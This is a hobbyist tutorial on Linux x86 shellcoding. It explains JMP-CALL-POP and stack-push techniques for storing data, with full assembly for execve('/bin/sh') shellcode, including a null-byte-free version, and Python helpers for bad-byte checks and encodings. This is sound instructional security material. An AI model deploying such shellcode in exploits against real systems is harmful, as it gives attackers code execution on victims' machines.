Hi!

I decided to spend some time on Linux shellcoding this weekend, and it was amazing! The last time I did anything similar was in my assembly classes at university, but that was a long time ago, it was about DOS, and it had nothing to do with shellcoding or security. So I figured this was the best time to have some fun and pick up new skills.

Ok, what does the word “Shellcode” mean?

In short, it is a piece of code that performs the necessary actions on the attacked system after some vulnerability has been successfully exploited. Usually, the word “Shellcode” applies only to binary exploitation (buffer overflows, heap-based attacks, etc.). In other cases, it is just a “Payload”.

It is important to note that shellcode is a byte sequence containing instructions that are executed directly by the hardware (the CPU) on the target system.

There are no sections like the ones in regular ELF or PE executables where we could store data. For example, ELF binaries usually have .data or .bss sections where variables are stored. If so, how can we store, for example, the IP address and port for a reverse TCP shell in our shellcode?

Well, I found two possible solutions.

1. EIP-based approach

You definitely know the CALL instruction: it pushes the address of the next instruction onto the stack and then transfers execution to its target. JMP (like the other jump instructions) also changes the execution flow, but it doesn’t push anything onto the stack.

What if we place our data right after a CALL instruction? In that case, the “address of the next instruction” that CALL pushes onto the stack is actually the address of our data, and we can load it into any register with a POP instruction.

global _start

section .text

_start:
    jmp MESSAGE      

PAYLOAD:

    ...

    pop ecx             ; Message Address

    ...
                      
MESSAGE:
    call PAYLOAD        ; Pushes the address of the string below
                        ; onto the stack as the return address (saved EIP)
    db "Hello, World!", 0dh, 0ah


section .data

This is part of my ‘Hello, World!’ shellcode, which uses this technique to access its data.

As you can see, the MESSAGE part of this code contains the CALL instruction followed by the string that we need in the PAYLOAD part. In my case, ECX has to hold the address of the string to be printed with the SYS_WRITE call, and a single POP instruction loads this address into ECX.
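A side note on why the listing jumps forward first and then calls backward: zero bytes tend to be a problem for shellcode (this post comes back to that further down), and the direction of the CALL decides whether its encoding contains them. The sketch below is only a small Python model of the `call rel32` encoding (opcode 0xE8 plus a signed 32-bit little-endian displacement). The helper name and the displacements of -20 and +20 are made up for illustration and are not taken from the real shellcode.

```python
import struct


def encode_call_rel32(displacement: int) -> bytes:
    """Model of x86 `call rel32`: opcode 0xE8 followed by a signed 32-bit
    little-endian displacement, counted from the end of the instruction."""
    return struct.pack("<Bi", 0xE8, displacement)


# Hypothetical displacements, chosen only for illustration.
backward = encode_call_rel32(-20)  # target label is located before the CALL
forward = encode_call_rel32(20)    # target label is located after the CALL

print(backward.hex(" "))  # e8 ec ff ff ff
print(forward.hex(" "))   # e8 14 00 00 00
```

A small negative displacement is filled with 0xFF bytes, while a small positive one is filled with zero bytes, which is presumably why the data and the CALL sit at the end of the code.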

Ok, let’s look at the next example. Using this technique, I wrote a shellcode that spawns a command shell for us.

Here is the code:

global _start

section .text

_start:
    jmp DATA      

PAYLOAD: 
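    pop ebx             ; EBX = address of "/bin/sh" (pushed by CALL)
    xor ecx, ecx        ; argv = NULL
    xor eax, eax        ; Clear EAX so that only AL has to be set below
    xor edx, edx        ; envp = NULL
    xor esi, esi        ; ESI is not read by SYS_EXECVE; clearing it is optional

    mov al, 0x0b        ; SYS_EXECVE syscall number (11)
    int 0x80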
DATA:
    call PAYLOAD       
    db "/bin/sh", 0h	

section .data

In this case, the string “/bin/sh” must have a “\x00” byte at the end, because SYS_EXECVE expects a null-terminated path. This code works fine and spawns a command shell for us. But what if we want to use it as part of an exploit? The terminator of “/bin/sh” becomes a bad character, because a “\x00” byte is not allowed in the input of many vulnerable applications (string-copy functions, for example, stop at the first null byte).
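Checking for bad characters by eye gets tedious quickly, so here is a minimal Python sketch of such a check. The function name `find_bad_bytes` and the default bad-character set (just “\x00”) are my assumptions for illustration; a real target may forbid other bytes too. Only the data part of the example is scanned here, not the assembled shellcode.

```python
def find_bad_bytes(shellcode: bytes, bad: bytes = b"\x00") -> list:
    """Return (offset, value) pairs for every byte of `shellcode`
    that also appears in the `bad` set."""
    return [(offset, value) for offset, value in enumerate(shellcode) if value in bad]


# Only the data part of the example above: the string and its terminator.
data = b"/bin/sh\x00"
print(find_bad_bytes(data))  # [(7, 0)]
```

The same function can be pointed at the full byte string of an assembled shellcode, with `bad` extended by whatever else the target filters out.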

What should we do in this case? Well, we can write a custom encoder (crypter) or use a publicly available one to avoid bad characters. I didn’t like this option, because I couldn’t write my own encoder yet and I wanted to do everything with my own hands.

Or we can find another way to store data in our shellcode!

2. Stack-based approach

The stack is awesome! You should know that if you are reading this article :D We can push any data we want onto it, and ESP will always point to the top of the stack. But how can we use it to carry data in our shellcode?

Ok, let’s look at the string “/bin/sh”, 0h again. First of all, any string is just a sequence of bytes. We can split this byte array into parts of 4 bytes each and push these parts onto the stack one by one, starting with the last part, because the stack grows toward lower addresses. After that, the whole string is on the stack and ESP points to its beginning! The main thing to note here is that x86 is a little-endian architecture, so the bytes of each part have to be written in reverse order in the pushed value.
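The splitting described above can be sketched in a few lines of Python. This is just a helper for computing the values by machine instead of by hand; the name `push_values` is hypothetical. It assumes the string has already been padded to a multiple of 4 bytes, so the example uses the 8-byte path “/bin//sh” rather than the 7-byte “/bin/sh”.

```python
def push_values(data: bytes) -> list:
    """Split `data` into 4-byte parts and return the 32-bit immediates
    to PUSH, in the order the PUSH instructions should appear."""
    if len(data) % 4 != 0:
        raise ValueError("length must be a multiple of 4; pad the string first")
    parts = [data[i:i + 4] for i in range(0, len(data), 4)]
    # The stack grows toward lower addresses, so the last part is pushed first.
    # Reading each part as a little-endian integer gives the immediate whose
    # bytes end up in memory in the original order.
    return [int.from_bytes(part, "little") for part in reversed(parts)]


for value in push_values(b"/bin//sh"):
    print(f"push 0x{value:08x}")
# push 0x68732f2f
# push 0x6e69622f
```

The terminating “\x00” is deliberately not part of the input, since it has to reach the stack some other way than as an immediate.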

What about “\x00”? Well, there are countless ways to push this byte onto the stack without putting it into the code. For example, we can run ‘xor eax, eax’ and ‘push eax’.

global _start

section .text

_start:
    xor eax, eax
    push eax            ; NULL terminator for "/bin//sh"

                        ; Push the string "/bin//sh" as two 4-byte parts,
                        ; last part first, in little-endian form:
    push 0x68732f2f     ; "hs//" reversed, i.e. "//sh" (extra / avoids \x00)
    push 0x6e69622f     ; "nib/" reversed, i.e. "/bin"

    mov ebx, esp        ; EBX points to the "/bin//sh" string

    xor ecx, ecx        ; argv = NULL
    xor edx, edx        ; envp = NULL
    xor esi, esi        ; ESI is not read by SYS_EXECVE; clearing it is optional

    mov al, 0x0b        ; SYS_EXECVE syscall number (EAX is still 0 from above)
    int 0x80

section .data

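The code itself doesn’t contain a “\x00” byte, but the string it builds on the stack still gets its terminator: what we actually push is “/bin//sh”, 0h. The extra “/” is padding. In 32-bit code, ‘push’ with a 4-byte immediate takes 5 bytes, 4 of which are the argument, so with a single “/” the last part would be only 3 bytes long and the fourth byte of the argument would be an additional “\x00” in our shellcode. Linux treats the doubled slash in the path like a single one, so SYS_EXECVE works and we get our shell.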
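To make the padding argument concrete, here is a small Python model of the `push imm32` encoding in 32-bit mode (opcode 0x68 followed by the 4-byte immediate). The helper name `encode_push_imm32` is made up for this sketch; it only mimics what the assembler emits for these two pushes and is not a general encoder.

```python
def encode_push_imm32(part: bytes) -> bytes:
    """Model of `push imm32`: opcode 0x68 followed by a 4-byte immediate.
    A part shorter than 4 bytes is padded with zero bytes, the same as
    writing a smaller constant in the assembly source."""
    if len(part) > 4:
        raise ValueError("a single PUSH carries at most 4 bytes")
    return b"\x68" + part.ljust(4, b"\x00")


print(encode_push_imm32(b"//sh").hex(" "))  # 68 2f 2f 73 68
print(encode_push_imm32(b"/sh").hex(" "))   # 68 2f 73 68 00
```

With the extra “/” all four immediate bytes carry data; without it, the last byte of the instruction is the “\x00” we were trying to avoid.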

Conclusion

Both techniques work fine under the right conditions. The first one touches the stack only for the return address pushed by CALL (useful in environments with limited stack space), and you can write the whole string as is, without splitting and little-endian magic; the price is that any “\x00” terminator ends up in the shellcode itself. The second one gives you the necessary flexibility, but at the cost of readability. Also, in other cases you may need more advanced padding for your strings: you can’t solve every problem with an extra “/”.

Good Luck!

The end